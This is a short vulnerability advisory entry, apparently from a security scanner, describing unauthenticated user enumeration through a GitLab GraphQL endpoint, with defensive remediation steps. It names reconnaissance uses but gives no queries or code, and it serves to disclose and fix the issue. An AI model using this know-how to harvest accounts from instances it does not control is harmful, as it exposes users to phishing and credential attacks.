Gitlab user disclosure
Description
The GitLab GraphQL API endpoint allows unauthenticated users to enumerate all registered user accounts on the instance. By querying the GraphQL interface without authentication, an attacker can retrieve a complete list of usernames, email addresses, and other user profile information. This information disclosure vulnerability provides attackers with valuable reconnaissance data that can be leveraged for targeted attacks such as phishing campaigns, credential stuffing, or social engineering.
Remediation
Configure the GitLab instance to restrict GraphQL API access for unauthenticated users. This can be achieved by:
1. Navigate to Admin Area > Settings > General > Visibility and access controls
2. Disable 'Public' visibility level if not required for your use case
3. Configure API rate limiting to prevent mass enumeration attempts
4. Implement authentication requirements for GraphQL endpoints by modifying the application settings or using a reverse proxy to enforce authentication
5. Review and restrict the 'users' query permissions in GraphQL to authenticated users only
6. Consider implementing IP whitelisting for API access if the instance is for internal use only
Additionally, audit existing user profiles to ensure only necessary information is publicly visible and educate users about setting appropriate privacy settings on their profiles.